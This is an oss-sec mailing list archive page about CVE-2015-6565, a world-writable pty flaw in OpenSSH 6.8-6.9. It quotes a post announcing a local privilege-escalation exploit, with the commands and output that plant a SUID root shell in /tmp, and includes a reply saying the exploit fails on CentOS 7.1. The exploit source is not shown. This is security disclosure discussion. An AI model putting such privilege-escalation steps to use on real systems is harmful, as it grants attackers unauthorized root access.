oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux

From: Noryungi <noryungi () gmail com>
Date: Thu, 26 Jan 2017 18:35:12 +0100
Does not work on centos 7.1 (unpatched) running stock openssh.

TTY capture works, /tmp/sh is created but user is unprivileged.

On Jan 26, 2017 5:52 PM, <up201407890 () alunos dcc fc up pt> wrote:


Hi list,

I know I'm late to the party, but I was bored, so I decided to write an
exploit for CVE-2015-6565 which affects OpenSSH 6.8-6.9
It is mostly considered to be a "DoS", even though Jann Horn publicly told
how it could be exploited for local privilege escalation, but I guess its
either PoC||GTFO for users to update.

From https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565

"sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY
devices, which allows local users to cause a denial of service (terminal
disruption) or possibly have unspecified other impact by writing to a
device, as demonstrated by writing an escape sequence."

I think the description should be updated.

$ gcc not_an_sshnuke.c -o not_an_sshnuke
$ ./not_an_sshnuke /dev/pts/3
[*] Waiting for slave device /dev/pts/3
[+] Got PTY slave /dev/pts/3
[+] Making PTY slave the controlling terminal
[+] SUID shell at /tmp/sh
$ /tmp/sh --norc --noprofile -p
# id
euid=0(root) groups=0(root)

Thanks,
Federico Bento.



----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Previous By Date Next
Previous By Thread Next

Current thread: